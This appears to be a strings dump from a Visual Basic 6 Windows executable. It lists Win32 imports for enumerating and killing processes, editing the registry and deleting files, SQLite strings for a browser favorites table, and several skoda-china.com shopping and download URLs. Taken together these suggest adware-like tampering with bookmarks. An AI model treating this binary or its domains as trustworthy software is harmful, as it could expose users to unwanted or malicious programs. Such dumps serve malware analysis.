zgemibbrvpbmmhvdeurcieep
zG//hgX3H3q
zgmykhlswwuksgzshz
zimhh
zkeapnzyaqqhkytnkqurqeocefugqbimjecfpydcydhezrnlnoroypfehshtdvkolgpwwebqrru
ZKvh0b180ZlVHI1L0ZpA0Zlc
zldanxtdrvnua
zmQvbsg4pSQ4JS7Cbtg0dtL4dSLCd21/ISv4X6yCbUN2
Zonl1ThDbfnOySQNxoXemTn1iTiNbfiNmnhXdd9IM0mRkZ91Xo91k5nfM09DmTdNkTx
zOUZcsEib3IWzTvW1OUj1k/W83trdqcaFTviYk2w
zRr7hviW6IrxlwbJQUYKhUY0gI7Wz8YIdJT7mMTrqq/Jg9mulV/1qIn7mVX1rVp7lV/+d8Kwg9/kgnHKsZd7aUYbDwq
zubzbvdwprgsitraal
zzzjmwtrxxvxkqpbgtmb
1tablefavoritefavorite
4http://taobao.skoda-china.com/
aasCvp0rOOgrd7Qb
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32.dll
_allmul
aRsU	Rs
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
CloseHandle
CreateMutexA
CREATE TABLE favorite(id INTEGER UNIQUE,url TEXT,title TEXT,type INTEGER(2),parentid INTEGER,nextid INTEGER,firstchildid INTEGER,titlewidth INTEGER,hitcount INTEGER,param1 INTEGER,param2 INTEGER,param3 INTEGER)/
CreateToolhelp32Snapshot
d8AstK0DXKv2ckP2
`.data
DeleteFileA
DllFunctionCall
dRsjWSs
Es6nTs
fdzjoemyslrqnsb
GetMem2
GetMem4
GetTickCount
GetVersionExA
hHek@h:
http://down.skoda-china.com/
http://hao.skoda-china.com/
http://jd.skoda-china.com/
http://tmall.skoda-china.com/
http://windows.skoda-china.com/
indexsqlite_autoindex_favorite_1favorite
J0E45ZYeIJ7oCt
jLh@J@
JUroot
JwL3Ol2YNAaS43Z429Eg
kernel32
lstrlenA
lUGZbj49Pjates
msvbvm60
MSVBVM60.DLL
mv08b62z430o9YO371
myslrqnsb
OpenProcess
Process32First
Process32Next
Qs0LRs6
Qs|5DsO
QsA^Rs
=Qsb>Rsi
QsdjRs:_RsZ
<QshrRs
Qs+oRs
Qso_Rs
QsqOQs
Qsq:Ts
QsSuTsV
QsucRs
RegCloseKey
RegCreateKeyA
RegDeleteValueA
RegEnumKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
Rs{eRsUBRs
RsQhRs
Rsr]Qs/
<Rs[rSsD~Ss
SQLite format 3
Ss__Rs
tcoywd
TerminateProcess
!This program cannot be run in DOS mode.
TsrkSs
Tt28d1Tt22Ti
uTsqbRs
vb6chs.dll
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaCastObj
__vbaChkstk
__vbaCopyBytesZero
__vbaDateVar
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaFileClose
__vbaFileCloseAll
__vbaFileOpen
__vbaFPException
__vbaFpI4
__vbaFpR8
__vbaFreeObj
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGetOwner3
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Abs
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLateMemCallLd
__vbaLateMemSt
__vbaLbound
__vbaLenBstr
__vbaLenVar
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPowerR8
__vbaPrintFile
__vbaPutOwner3
__vbaR4Var
__vbaR8Sgn
__vbaR8Str
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaSetSystemError
__vbaStrCat
__vbaStrCmp
__vbaStrComp
__vbaStrCopy
__vbaStrFixstr
__vbaStrI4
__vbaStrMove
__vbaStrR8
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrUI1
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I4
__vbaUI1Var
__vbaVar2Vec
__vbaVarAnd
__vbaVarCat
__vbaVarDup
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
__vbaVarTstNe
WaitForSingleObject
YzyPXeSJ
?zhttp://ju.skoda-china.com/